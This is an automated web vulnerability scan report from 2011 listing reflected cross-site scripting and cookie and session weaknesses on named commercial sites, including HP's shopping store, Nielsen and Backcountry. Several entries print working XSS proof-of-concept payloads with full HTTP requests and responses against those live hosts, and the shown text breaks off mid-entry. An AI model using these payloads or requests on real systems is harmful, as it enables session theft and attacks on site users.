XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09202011-01

Report generated by XSS.CX at Thu Sep 22 12:29:48 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/ce749a_main [REST URL parameter 5]

1.2. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/cn731a_main [REST URL parameter 5]

1.3. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$bg parameter]

1.4. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$dt parameter]

1.5. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$fti parameter]

1.6. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$mon parameter]

1.7. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [REST URL parameter 5]

1.8. http://nielsen.com/content/corporate/us/en/search.html [q parameter]

1.9. http://nielsen.com/content/corporate/us/en/search/_jcr_content/par.autocomp.html [caller parameter]

1.10. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 4]

1.11. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 5]

1.12. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 6]

1.13. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 7]

1.14. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 4]

1.15. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 5]

1.16. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 6]

1.17. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 7]

1.18. http://sales.liveperson.net/hc/9551721/ [msessionkey parameter]

1.19. http://www.backcountry.com/store/cart/add.html [mv_sku parameter]

1.20. http://www.shopping.hp.com/design [jumpid parameter]

1.21. http://www.shopping.hp.com/desktops [HHOJSID parameter]

1.22. http://www.shopping.hp.com/esp [HHOJSID parameter]

1.23. http://www.shopping.hp.com/printer [HHOJSID parameter]

1.24. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store [REST URL parameter 5]

1.25. http://www.shopping.hp.com/supplies [HHOJSID parameter]

1.26. http://www.shopping.hp.com/webapp/shopping/add_to_cart.do [nextPage parameter]

1.27. http://www.shopping.hp.com/webapp/shopping/can.do [catLevel parameter]

1.28. http://www.shopping.hp.com/webapp/shopping/can.do [jumpid parameter]

1.29. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [PROD_LIST parameter]

1.30. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [lanAttr parameter]

1.31. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [landing parameter]

1.32. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [subcat1 parameter]

1.33. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]

1.34. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]

1.35. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]

1.36. http://www.shopping.hp.com/webapp/shopping/product_detail.do [catLevel parameter]

1.37. http://www.shopping.hp.com/webapp/shopping/product_detail.do [catLevel parameter]

1.38. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]

1.39. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]

1.40. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]

1.41. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]

1.42. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]

1.43. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]

1.44. http://www.shopping.hp.com/webapp/shopping/product_detail.do [mc parameter]

1.45. http://www.shopping.hp.com/webapp/shopping/product_detail.do [mc parameter]

1.46. http://www.shopping.hp.com/webapp/shopping/product_detail.do [omniData parameter]

1.47. http://www.shopping.hp.com/webapp/shopping/product_detail.do [storeName parameter]

1.48. http://www.shopping.hp.com/webapp/shopping/product_detail.do [storeName parameter]

1.49. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]

1.50. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]

1.51. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]

1.52. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

1.53. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

1.54. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

1.55. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

1.56. http://www.shopping.hp.com/webapp/shopping/store_access.do [category parameter]

1.57. http://www.shopping.hp.com/webapp/shopping/store_access.do [jumpid parameter]

1.58. http://www.shopping.hp.com/webapp/shopping/store_access.do [jumpid parameter]

2. Session token in URL

2.1. http://sales.liveperson.net/hc/9551721/

2.2. http://www.backcountry.com/

2.3. http://www.backcountry.com/backcountry-gift-certificate-bcs0021

2.4. http://www.backcountry.com/mens-clothing

2.5. http://www.backcountry.com/prana-bliss-capri-pant-womens

2.6. http://www.backcountry.com/store/cart/add.html

2.7. http://www.backcountry.com/store/user.html

2.8. http://www.backcountry.com/womens-capri-pants

2.9. http://www.backcountry.com/womens-clothing

3. Cookie scoped to parent domain

3.1. http://www.backcountry.com/store/BCS0021

3.2. http://www.backcountry.com/store/PRA0870/Bliss-Capri-Pant-Womens.html

3.3. http://www.shopping.hp.com/design

3.4. http://www.shopping.hp.com/desktops

3.5. http://www.shopping.hp.com/esp

3.6. http://www.shopping.hp.com/go/microsoftoffers

3.7. http://www.shopping.hp.com/go/touchpadfaqs

3.8. http://www.shopping.hp.com/printer

3.9. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store

3.10. http://www.shopping.hp.com/supplies

3.11. http://www.shopping.hp.com/webapp/shopping/can.do

3.12. http://www.shopping.hp.com/webapp/shopping/home.do

3.13. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do

3.14. http://www.shopping.hp.com/webapp/shopping/product_advisor.do

3.15. http://www.shopping.hp.com/webapp/shopping/product_comparison.do

3.16. http://www.shopping.hp.com/webapp/shopping/product_detail.do

3.17. http://www.shopping.hp.com/webapp/shopping/search_request.do

3.18. http://www.shopping.hp.com/webapp/shopping/series_can.do

3.19. http://www.shopping.hp.com/webapp/shopping/store_access.do

4. Cookie without HttpOnly flag set

4.1. http://www.backcountry.com/mens-clothing

4.2. http://www.backcountry.com/store/BCS0021

4.3. http://www.backcountry.com/store/PRA0870/Bliss-Capri-Pant-Womens.html

4.4. http://www.backcountry.com/store/cart/add.html

4.5. http://www.backcountry.com/store/cart/ajax/check_cart_reload_needed.html

4.6. http://www.backcountry.com/store/user.html

4.7. http://nielsen.com/bin/statistics/tracker/query

4.8. http://nielsen.com/bin/statistics/tracker/result

4.9. http://nielsen.com/content/corporate/us/en/_jcr_content/logogeneric.limg.png/1291333524989.png

4.10. http://nielsen.com/content/corporate/us/en/measurement/online-measurement/_jcr_content/bannerPar/image.img.jpg/1314307161790.jpg

4.11. http://nielsen.com/content/corporate/us/en/measurement/television-measurement/_jcr_content/bannerPar/image.img.jpg/1314308133299.jpg

4.12. http://nielsen.com/content/corporate/us/en/search.html

4.13. http://nielsen.com/content/corporate/us/en/search/_jcr_content/par.autocomp.html

4.14. http://nielsen.com/content/cus_config/favicons/corporate/us/en/favicon.ico

4.15. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/1pxGradient_blue.gif

4.16. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/1px_gray_gradient_bkg.png

4.17. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/blue-arrow-on-gray.png

4.18. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/right_arrow.png

4.19. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/email-link.gif

4.20. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/facebook.gif

4.21. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif

4.22. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/search.png

4.23. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/twit.gif

4.24. http://nielsen.com/content/dam/corporate/us/en/graphix/icons/goldKey.gif

4.25. http://nielsen.com/content/dam/corporate/us/en/graphix/icons/world_icon.gif

4.26. http://nielsen.com/content/dam/css/corporate/addons.css

4.27. http://nielsen.com/content/dam/css/corporate/clearfix.css

4.28. http://nielsen.com/etc/clientlibs/foundation/jquery.js

4.29. http://nielsen.com/etc/clientlibs/foundation/librarymanager.js

4.30. http://nielsen.com/etc/clientlibs/foundation/shared.js

4.31. http://nielsen.com/etc/designs/corporate.css

4.32. http://nielsen.com/etc/designs/corporate/additions.css

4.33. http://nielsen.com/etc/designs/corporate/clientlibs.css

4.34. http://nielsen.com/etc/designs/corporate/clientlibs.js

4.35. http://nielsen.com/etc/designs/corporate/clientlibs/themes/default.css

4.36. http://nielsen.com/etc/designs/corporate/cq.css

4.37. http://nielsen.com/etc/designs/corporate/images/bullet-n3.gif

4.38. http://nielsen.com/etc/designs/corporate/images/default.gif

4.39. http://nielsen.com/etc/designs/corporate/images/pix.gif

4.40. http://nielsen.com/etc/designs/corporate/images/topnav/navFirst.gif

4.41. http://nielsen.com/etc/designs/corporate/images/topnav/navGround.gif

4.42. http://nielsen.com/etc/designs/corporate/images/topnav/navNormal.gif

4.43. http://nielsen.com/etc/designs/corporate/nielsencustom.css

4.44. http://nielsen.com/etc/designs/corporate/pagelayout.css

4.45. http://nielsen.com/etc/designs/corporate/reset.css

4.46. http://nielsen.com/etc/designs/corporate/static.css

4.47. http://nielsen.com/etc/designs/corporate/static/js/autocomp/jquery-1.3.2.min.js

4.48. http://nielsen.com/etc/designs/corporate/static/js/autocomp/jquery.autocomplete-min.js

4.49. http://nielsen.com/etc/designs/corporate/static/js/horzNav.js

4.50. http://nielsen.com/etc/designs/corporate/static/js/nielsenJs.js

4.51. http://nielsen.com/etc/designs/corporate/topnav.css

4.52. http://nielsen.com/favicon.ico

4.53. http://nielsen.com/libs/cq/personalization/components/clickstreamcloud/content/config.json

4.54. http://nielsen.com/us/en/insights/press-room/2008/nielsen_reports_tv.html

4.55. http://nielsen.com/us/en/measurement/online-measurement.html

4.56. http://nielsen.com/us/en/measurement/television-measurement.html

4.57. http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html

4.58. http://sales.liveperson.net/hc/9551721/

4.59. http://www.shopping.hp.com/design

4.60. http://www.shopping.hp.com/desktops

4.61. http://www.shopping.hp.com/esp

4.62. http://www.shopping.hp.com/go/microsoftoffers

4.63. http://www.shopping.hp.com/go/touchpadfaqs

4.64. http://www.shopping.hp.com/printer

4.65. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store

4.66. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store

4.67. http://www.shopping.hp.com/supplies

4.68. http://www.shopping.hp.com/webapp/shopping/add_to_cart.do

4.69. http://www.shopping.hp.com/webapp/shopping/can.do

4.70. http://www.shopping.hp.com/webapp/shopping/home.do

4.71. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do

4.72. http://www.shopping.hp.com/webapp/shopping/product_advisor.do

4.73. http://www.shopping.hp.com/webapp/shopping/product_comparison.do

4.74. http://www.shopping.hp.com/webapp/shopping/product_detail.do

4.75. http://www.shopping.hp.com/webapp/shopping/search_request.do

4.76. http://www.shopping.hp.com/webapp/shopping/series_can.do

4.77. http://www.shopping.hp.com/webapp/shopping/store_access.do

5. Password field with autocomplete enabled

5.1. http://www.backcountry.com/store/user.html

5.2. http://www.backcountry.com/store/user.html

6. Cross-domain POST

6.1. http://www.shopping.hp.com/design

6.2. http://www.shopping.hp.com/desktops

6.3. http://www.shopping.hp.com/esp

6.4. http://www.shopping.hp.com/printer

6.5. http://www.shopping.hp.com/supplies

6.6. http://www.shopping.hp.com/webapp/shopping/home.do

6.7. http://www.shopping.hp.com/webapp/shopping/product_comparison.do

6.8. http://www.shopping.hp.com/webapp/shopping/product_detail.do

6.9. http://www.shopping.hp.com/webapp/shopping/series_can.do

6.10. http://www.shopping.hp.com/webapp/shopping/store_access.do

6.11. http://www.shopping.hp.com/webapp/shopping/store_access.do

7. Cross-domain Referer leakage

7.1. http://nielsen.com/content/corporate/us/en/search.html

7.2. http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html

7.3. http://www.backcountry.com/store/cart/add.html

7.4. http://www.shopping.hp.com/design

7.5. http://www.shopping.hp.com/desktops

7.6. http://www.shopping.hp.com/esp

7.7. http://www.shopping.hp.com/go/microsoftoffers

7.8. http://www.shopping.hp.com/go/touchpadfaqs

7.9. http://www.shopping.hp.com/printer

7.10. http://www.shopping.hp.com/shopping/html/popup/mtfs_webdetails_master.html

7.11. http://www.shopping.hp.com/supplies

7.12. http://www.shopping.hp.com/webapp/shopping/can.do

7.13. http://www.shopping.hp.com/webapp/shopping/product_advisor.do

7.14. http://www.shopping.hp.com/webapp/shopping/product_detail.do

7.15. http://www.shopping.hp.com/webapp/shopping/search_request.do

7.16. http://www.shopping.hp.com/webapp/shopping/series_can.do

7.17. http://www.shopping.hp.com/webapp/shopping/store_access.do

7.18. http://www.shopping.hp.com/webapp/shopping/store_access.do

8. Cross-domain script include

8.1. http://www.backcountry.com/

8.2. http://www.backcountry.com/backcountry-gift-certificate-bcs0021

8.3. http://www.backcountry.com/mens-clothing

8.4. http://www.backcountry.com/prana-bliss-capri-pant-womens

8.5. http://www.backcountry.com/store/cart/add.html

8.6. http://www.backcountry.com/store/user.html

8.7. http://www.backcountry.com/womens-capri-pants

8.8. http://www.backcountry.com/womens-clothing

8.9. http://www.shopping.hp.com/design

8.10. http://www.shopping.hp.com/desktops

8.11. http://www.shopping.hp.com/esp

8.12. http://www.shopping.hp.com/go/microsoftoffers

8.13. http://www.shopping.hp.com/go/touchpadfaqs

8.14. http://www.shopping.hp.com/printer

8.15. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store

8.16. http://www.shopping.hp.com/shopping/html/popup/mtfs_webdetails_master.html

8.17. http://www.shopping.hp.com/supplies

8.18. http://www.shopping.hp.com/webapp/shopping/can.do

8.19. http://www.shopping.hp.com/webapp/shopping/home.do

8.20. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do

8.21. http://www.shopping.hp.com/webapp/shopping/product_advisor.do

8.22. http://www.shopping.hp.com/webapp/shopping/product_comparison.do

8.23. http://www.shopping.hp.com/webapp/shopping/product_detail.do

8.24. http://www.shopping.hp.com/webapp/shopping/search_request.do

8.25. http://www.shopping.hp.com/webapp/shopping/series_can.do

8.26. http://www.shopping.hp.com/webapp/shopping/store_access.do

8.27. http://www.shopping.hp.com/webapp/shopping/store_access.do

9. TRACE method is enabled

10. Email addresses disclosed

10.1. http://www.backcountry.com/prana-bliss-capri-pant-womens

10.2. http://www.backcountry.com/store/user.html

11. Robots.txt file

12. HTML does not specify charset

12.1. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

12.2. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

13. Content type incorrectly stated

13.1. http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/button_bg_mpr.gif

13.2. http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/sitewide_offers_bg.gif

13.3. http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp8_70.gif

13.4. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

13.5. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

13.6. http://oascentral.feedroom.com/favicon.ico

13.7. http://sales.liveperson.net/hcp/html/mTag.js

13.8. http://www.backcountry.com/js/global/highslide/graphics/zoomin.cur

13.9. http://www.backcountry.com/js/global/highslide/graphics/zoomout.cur

13.10. http://www.backcountry.com/store/cart/ajax/check_cart_reload_needed.html

13.11. http://www.shopping.hp.com/webapp/shopping/hho_cart.do

13.12. http://www.shopping.hp.com/webapp/shopping/product_advisor_ajax.do



1. Cross-site scripting (reflected)  next
There are 58 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/ce749a_main [REST URL parameter 5]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/ce749a_main

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3be37<img%20src%3da%20onerror%3dalert(1)>7312d097c94 was submitted in the REST URL parameter 5. This input was echoed as 3be37<img src=a onerror=alert(1)>7312d097c94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/ce749a_main3be37<img%20src%3da%20onerror%3dalert(1)>7312d097c94?$featured_fmt$ HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://search.hp.com/query.html?qt=xss+printer&charset=iso-8859-1&la=en&hpvc=HHOid&qs=&nh=10&lk=1&rf=0&uf=1&qp=url%3Ahttp&hps=Home+%26+Home+Office&hpn=Return+to+Home+%26+Home+Office&hpr=http%3A%2F%2Fwww.shopping.hp.com%2Fwebapp%2Fshopping%2Fhome.do&hpa=http%3A%2F%2Fwww.homeandoffice.hp.com%2Fhho%2Fus%2Fen%2Fcontact_hp.html&hph=&hpl=1&hpo=hphqhhomktg&h_audience=hho&h_audiencerestrict=&st=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 82
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:55:19 GMT
Date: Thu, 22 Sep 2011 00:55:19 GMT
Connection: close

Unable to find /HPShopping/ce749a_main3be37<img src=a onerror=alert(1)>7312d097c94

1.2. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/cn731a_main [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/cn731a_main

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 10844<img%20src%3da%20onerror%3dalert(1)>6dd168a1ea was submitted in the REST URL parameter 5. This input was echoed as 10844<img src=a onerror=alert(1)>6dd168a1ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/cn731a_main10844<img%20src%3da%20onerror%3dalert(1)>6dd168a1ea?$preview_fmt$ HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 81
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 01:08:20 GMT
Date: Thu, 22 Sep 2011 01:08:20 GMT
Connection: close

Unable to find /HPShopping/cn731a_main10844<img src=a onerror=alert(1)>6dd168a1ea

1.3. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$bg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $bg request parameter is copied into the HTML document as plain text between tags. The payload a1f2e<img%20src%3da%20onerror%3dalert(1)>90fc7708bbe was submitted in the $bg parameter. This input was echoed as a1f2e<img src=a onerror=alert(1)>90fc7708bbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$hdl2=&$hdl1=Save%20up%20to%20%24340&$hlc1=&$bdc1=on%2023%2Dinch%20Touch%20PC%20with%20free%20upgrade%20to%201%2E5TB%20hard%20drive%2C%20a%20TV%20tuner%2C%20and%20Beats%20Audio%E2%84%A2&$hlc2=&$bdc2=&$ftc=&$fti=is%7BHPShopping%2Fqb911av%5Fmain%7D&$mon=is%7BHPShopping%2F%7D&$dt=is%7BHPShopping%2F%7D&$bg=HPShopping%2Fwbg1a1f2e<img%20src%3da%20onerror%3dalert(1)>90fc7708bbe HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:54:59 GMT
Date: Thu, 22 Sep 2011 00:54:59 GMT
Connection: close

Unable to find /HPShopping/HPShopping/wbg1a1f2e<img src=a onerror=alert(1)>90fc7708bbe

1.4. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$dt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $dt request parameter is copied into the HTML document as plain text between tags. The payload e109d<img%20src%3da%20onerror%3dalert(1)>a54868bbeea was submitted in the $dt parameter. This input was echoed as e109d<img src=a onerror=alert(1)>a54868bbeea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$hdl2=&$hdl1=Save%20up%20to%20%24340&$hlc1=&$bdc1=on%2023%2Dinch%20Touch%20PC%20with%20free%20upgrade%20to%201%2E5TB%20hard%20drive%2C%20a%20TV%20tuner%2C%20and%20Beats%20Audio%E2%84%A2&$hlc2=&$bdc2=&$ftc=&$fti=is%7BHPShopping%2Fqb911av%5Fmain%7D&$mon=is%7BHPShopping%2F%7D&$dt=is%7BHPShopping%2F%7De109d<img%20src%3da%20onerror%3dalert(1)>a54868bbeea&$bg=HPShopping%2Fwbg1 HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:54:58 GMT
Date: Thu, 22 Sep 2011 00:54:58 GMT
Connection: close

Unable to find /HPShopping/is{HPShopping/}e109d<img src=a onerror=alert(1)>a54868bbeea

1.5. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$fti parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $fti request parameter is copied into the HTML document as plain text between tags. The payload 1b9f8<img%20src%3da%20onerror%3dalert(1)>16f60277da7 was submitted in the $fti parameter. This input was echoed as 1b9f8<img src=a onerror=alert(1)>16f60277da7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$hdl2=&$hdl1=Save%20up%20to%20%24340&$hlc1=&$bdc1=on%2023%2Dinch%20Touch%20PC%20with%20free%20upgrade%20to%201%2E5TB%20hard%20drive%2C%20a%20TV%20tuner%2C%20and%20Beats%20Audio%E2%84%A2&$hlc2=&$bdc2=&$ftc=&$fti=is%7BHPShopping%2Fqb911av%5Fmain%7D1b9f8<img%20src%3da%20onerror%3dalert(1)>16f60277da7&$mon=is%7BHPShopping%2F%7D&$dt=is%7BHPShopping%2F%7D&$bg=HPShopping%2Fwbg1 HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 98
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:54:55 GMT
Date: Thu, 22 Sep 2011 00:54:55 GMT
Connection: close

